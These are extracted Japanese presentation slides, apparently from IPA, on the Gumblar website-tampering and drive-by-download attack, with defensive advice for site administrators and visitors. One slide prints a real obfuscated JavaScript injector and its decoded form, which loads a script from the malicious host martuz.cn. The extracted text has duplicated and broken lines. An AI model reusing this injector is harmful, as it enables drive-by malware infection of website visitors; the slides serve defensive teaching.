終息しない「ガンブラー攻撃」、 その対策は？

終息しない「ガンブラー攻撃」、
その対策は？
2010年10月28日
独立行政法人情報処理推進機構
セキュリティセンター ウイルス・不正アクセス対策グループ
主幹
Copyright © 2010 独立行政法人情報処理推進機構
加賀谷 伸一郎
本日の講演内容
１．「ガンブラー攻撃」についての復習
１
「ガンブラー攻撃」についての復習
２．改ざんの実例
３．対策方法の整理
Copyright © 2010 独立行政法人情報処理推進機構
2
“ガンブラー”の解説
“ガンブラー”（Gumblar）とは？
ウェブ経由でパソコンにウイルスを感染させよう
とする攻撃手法の一種（Drive-by
（Drive by download）
｢ウェブサイト改ざん｣と｢ウェブ感染型ウイルス｣
を組み合わせた攻撃
“正規のサイト”が改ざんされるため

正規のサイト が改ざんされるため、サイト
サイト
閲覧者の警戒度は低い
IPAに情報が寄せられた改ざんサイト情報は
100件以上（2010年6月以降）
Copyright © 2010 独立行政法人情報処理推進機構
3
正規のウェブサイトを経由した攻撃とは
正規ウェブサイトを改ざんして利用者が攻撃される
○○○○
http://○○○.co.jp/
○○○○○○○○
■■■■■■■■■■■■■■
■■■■■■■■■■■■■■
■■■■■■
■■■■■■■■■■■■■■
■■■■■■■■■■■■■■
■■■■■■
○○○○
http://▼▼▼.ne.jp/
p
jp
○○○○○○○○
■■■■■■■■■■■■■■
■■■■■■■■■■■■■■
■■■■■■
■■■■■■■■■■■■■■
■■■■■■■■■■■■■■
■■■■■■
http://△△△.or.jp/
○○○○○○○○
■ ■■■ ■■■ ■■■ ■■■ ■
■ ■■■ ■■■ ■■■ ■■■ ■
■ ■■■ ■■
■ ■■■ ■■■ ■■■ ■■■ ■
■ ■■■ ■■■ ■■■ ■■■ ■
■ ■■■ ■■
Copyright © 2010 独立行政法人情報処理推進機構
4
2010年版 10大脅威
【1位】変化を続けるｳｪﾌﾞｻｲﾄ改ざんの手口
Copyright © 2010 独立行政法人情報処理推進機構
5
ガンブラー攻撃の場合は・・・
悪意あるウェブサイト
gumblar.cn
g
<script>
悪意あるウェブサイトへ
あ ウ
行け！！
行
悪意あるサイトにあるスクリプトを読め！
</script>
でも 裏では・・・
悪意あるコードが
挿入されている
見た目はいつも通り
同時にこちらへも・・
閲覧
改ざんされた正規ウェブサイト
感染！
一般利用者
Copyright © 2010 独立行政法人情報処理推進機構
6
ガンブラー攻撃の全体図
Copyright © 2010 独立行政法人情報処理推進機構
7
サイト閲覧者にとっての脅威
 セキュリティ対策が不十分なパソコンでは、サイトを閲覧する
だけでウイルスに感染させられてしまい か
だけでウイルスに感染させられてしまい、かつ、ウイルスに
ウイルスに
感染したことが見た目には全く分からない場合がある
 有名企業のウェブサイトが攻撃に使われる場合があるため、
「不審なウェブサイトを閲覧しない」といった回避策が有効と
ならず、日常的に利用しているウェブサイトが突然危険な
ウェブサイトとなる可能性もある
 悪意あるサイ
悪意あるサイトに仕掛けられるウイルスは攻撃者が任意に
仕掛け れるウイ
攻撃者 任意
コントロールできるため、閲覧者はどのようなウイルスに
感染させられるか予測できない
Copyright © 2010 独立行政法人情報処理推進機構
8
サイト閲覧者側の被害事例
現在のところ、次に挙げるウイルスに感染
した事例が報告されている
ウェブサイト管理用の ID とパスワ
とパスワード（ftpの
ド（ftpの
アカウント情報）を盗むウイルス
パソコン内のソフトで保存しているIDとパスワー
パソコン内のソフトで保存しているIDとパスワ
ド情報を盗むウイルス（ftpクライアントやIE6）
偽セキ リテ 対策
偽セキュリティ対策ソフト型ウイルス
ト型ウイルス
（ウイルスが発見されたという偽の表示を行い、駆除するために偽セキュリティ対策
ソフトの「有償版」の購入を迫るウイルス）
周囲のマシンにDoS攻撃を仕掛けるウイルス
今後 どのようなウイルスが仕掛けられるか分からない！
今後、どのようなウイルスが仕掛けられるか分からない！
Copyright © 2010 独立行政法人情報処理推進機構
9
連鎖するガンブラー攻撃の被害
ウェブサイトの改ざん
＆ ウイルスの配置
攻撃に使われる
ウェブサイト
攻撃者
①
④
③
①’
ウェブサイト管理用ID
とパスワードの盗難
②
ID=satou
PASS=abc
一般利用者と
同じ仕組みで
ウイルス感染
ウェブ利用者 かつ
ウェブサイトの管理者
Copyright © 2010 独立行政法人情報処理推進機構
10
１．「ガンブラー攻撃」についての復習
１
「ガンブラー攻撃」についての復習
２．改ざんの実例
３．対策方法の整理
Copyright © 2010 独立行政法人情報処理推進機構
11
2009年5月に発見した事例
<script language=javascript><!-(function(){var eaW='%';var yvwNr=('va-72-20-61-3d-22-53-63-72iptEngine-22-2cb-3d-22Ve-7273ion()-2b-22-2cj-3d-22-22-2cu-3dnavi-67ator-2euserAgent-3bif-28-28u-2e-69n-64e-78O-66(-22-4368ro-6de-22)-3c0)-26-26(-75-2eindexOf(-22Win-22)-3e0)-26-26(u-2eindexOf(-22NT-206-22-29-3c-30)26-26-28-64o-63u-6dent-2ec-6fokie-2e-69ndex-4ff-28-22-6d-69ek-3d-31-22)-3c0)-26-26-28-74-79pe-6ff28zrv-7a-74-73-29-21-3d-74yp-65-6ff(-22A-22-29))-7bzrvzts-3d-22A-22-3beva-6c(-22if-28w-69-6edow2e-22+a+-22-29j-3d-6a+-22+a+-22Major-22+b+a-2b-22Mi-6eor-22+b+a+-22Build-22+b+-22j-3b-22-293bdocu-6d-65nt-2ew-72ite(-22-3c-73cript-20sr-63-3d-2f-2fma-72-22+-22tuz-2e-63-6e-2f-76id-2f-3f-69d3d-22-2bj+-22-3e-3c-5c-2fs-63rip-74-3e-22)-3b-7d').replace(/-/g,eaW);eval(unescape(yvwNr))})();
●replace操作
操作 ( ‘－’ を ‘％’に置換)
換
●unescape関数でデコード
var a=“ScriptEngine”
p
g
,b=“Version()+
() ”,j=“”
j
,u=navigator.userAgent;
g
g
if((u.indexOf(“Chrome”)<0)&&(u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6”) <0) &&
(document.cookie.indexOf(“miek=1”) <0) && (typeof(zrvzts)!=
typeof(“A”))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script
(
p src=//mar"+"tuz.cn/vid/?id="+j+"><¥/script>")
j
p );}
martuz.cn に飛ばされるようになっていた！
Copyright © 2010 独立行政法人情報処理推進機構
12
2009年12月に発見した事例
Copyright © 2010 独立行政法人情報処理推進機構
13
2010年8月、10月に発見した事例
・HTMLファイルの末尾や冒頭に1行・・・
・難読化されていない
・悪意あるサイトの.jsファイルや.phpファイルを読み込むスクリプト
Copyright © 2010 独立行政法人情報処理推進機構
14
１．「ガンブラー攻撃」についての復習
１
「ガンブラー攻撃」についての復習
２．改ざんの実例
３．対策方法の整理
Copyright © 2010 独立行政法人情報処理推進機構
15
改ざんを防ぐためのサイト管理方法
 【パスワードの強化】複数人での使い回しもしない。
 【アクセス制限】ウェブサイトを更新できる場所を組織内
ウ ブサイトを更新できる場所を組織内
のみに限定するよう、ネットワークやサーバの構成を見直す。
もし、インタ ネット経由でウェブサイトを更新する必要が
もし、インターネット経由でウェブサイトを更新する必要が
ある場合でも、接続元IPアドレスを制限したりVPNを導入する
など。
 【ftp以外でサイト更新】ftp接続は拒否し他の方法で。
 SSH（Secure SHell）のscp（Secure Copy）コマンド
 FTPS（File Transfer Protocol over SSL/TLS）
 【更新専用パソコンの導入】ウェブサイトを更新するため
の専用パソコンを導入する。このパソコンでは、ウイルスに
よる被害を防止するためにウェブの閲覧やメールの確認を
せず ウイルス対策ソフトを最新の状態にし 可能な限り
せず、ウイルス対策ソフトを最新の状態にし、可能な限り
脆弱性を解消しておく。専用ネットからの更新ならなお良し。
Copyright © 2010 独立行政法人情報処理推進機構
16
改ざんを防ぐためのサイト管理方法
ftp以外でサイト更新
scp、FTPS
FTPS
など
VPNなど
アクセス制限
外部のウェブサイト管理者
Copyright © 2010 独立行政法人情報処理推進機構
17
ウェブページ更新用パソコンでの対策
• ウェブページのupload専用とし、メール送受信
p
やウェブサイト閲覧はしない
ウェブサイトの改ざん
＆ ウイルスの配置
攻撃に使われる
ウェブサイト
攻撃者
被害の連鎖を
断ち切る！
ウェブサイト管理用ID
とパスワードの盗難
ID=satou
PASS=abc
一般利用者と
同じ仕組みで
ウイルス感染
ウェブ利用者 かつ
ウェブサイトの管理者
Copyright © 2010 独立行政法人情報処理推進機構
18
改ざんに気付くためのサイト管理方法
ウェブサイト上にメールアドレス等の連絡先を
掲載しておくことで、外部から指摘が・・・
クリーンな状態のウェブページファイルを、
クリーンな状態のウェブページファイルを
安全な形（DVDに焼くなど）で別途保管して
おき ウ ブサ バ上のフ イルと定期的に
おき、ウェブサーバ上のファイルと定期的に
比較
ウェブサイトの更新等に使用する ftp等 の
アクセスログを定期的にチェック
 改ざんを早期に発見するためのウェブサイト改ざん検知
サービスなどを利用
サ
ビスなどを利用
（悪意あるサイトへのリンクがないかチェック可能ならなお良し）
Copyright © 2010 独立行政法人情報処理推進機構
19
なるべくお金を掛けない方法はないの？
ウイルス対策ソフト入りパソコンで、管理して
いるウェブページを閲覧し、ウイルス警告が
出ない状態を維持す く手動で監視
出ない状態を維持すべく手動で監視
ウイルス検知精度を上げるには・・
利用するウイルス対策ソフトの数を増やす
（それに伴いパソコンの台数も増やす必要あり）
ウェブページ監視の頻度を上げる
（1日毎？ 何時間毎？ 何分毎？）
無料のウェブサイトチェックサ ビスを利用
無料のウェブサイトチェックサービスを利用
VirusTotal
http://www.virustotal.com/index.html#url-submission
//
/
#
Copyright © 2010 独立行政法人情報処理推進機構
20
VirusTotalでのチェック例
Copyright © 2010 独立行政法人情報処理推進機構
21
ウェブブラウザによる警告の例
Copyright © 2010 独立行政法人情報処理推進機構
22
検索サイトによる警告の例
それでも見ようとして
クリックすると
クリックすると・・・
Copyright © 2010 独立行政法人情報処理推進機構
23
検索サイトによる警告の例（つづき）
Copyright © 2010 独立行政法人情報処理推進機構
24
改ざん被害発生時の対処
早急なウェブサイトの公開停止
“加害者”にならないために・・・
改ざん箇所の洗い出し等の調査
ウェブページファイル比較、ftpアクセスログ確認
全ウェブページファイルをDLし、ウイルスチェック
ウェブサイトを再公開する場合の注意点
サイト閲覧者に向けた事実告知が重要
事実の説明、改ざん箇所、改ざん期間、想定される被害内容、
事実の説明
改ざん箇所 改ざん期間 想定される被害内容
ウイルスチェック方法、連絡先明示など
Copyright © 2010 独立行政法人情報処理推進機構
25
サイト閲覧者側の対策方法
ウイルス対策ソフトの導入と適切な運用
ウイルス定義ファイルを最新に保つことが必須！
統合型セキュリティ対策ソフトがオススメ
（有害サイトのブロック機能が有効）
脆弱性の解消
OS（Windowsなど）、その他ソフト全てを最新に！
こまめなアップデートが必須！
（ご参考）「MyJVN
（ご参考）「M
JVN バージョンチェッカ」（IPA）
バ ジ ンチ カ （IPA）
http://jvndb.jvn.jp/apis/myjvn/#VCCHECK
※ 2010年10月現在、Windows
2010年10月現在 Windows XP と Vista に対応
Copyright © 2010 独立行政法人情報処理推進機構
26
MyJVNバージョンチェッカ 実施例
Copyright © 2010 独立行政法人情報処理推進機構
27
セキュリティセンター（IPA/ISEC）
セキュリティセンタ
（IPA/ISEC）
http://www.ipa.go.jp/security/
g j
y
★情報セキュリティ安心相談窓口：
ＴＥＬ ０３（５９７８）７５０９
(IPA職員による対応は平日10:00-12:00、13:30-17:00)
ＦＡＸ ０３（５９７８）７５１８
E mail： [email protected]
E-mail：
anshin@ipa go jp
Copyright © 2010 独立行政法人情報処理推進機構
28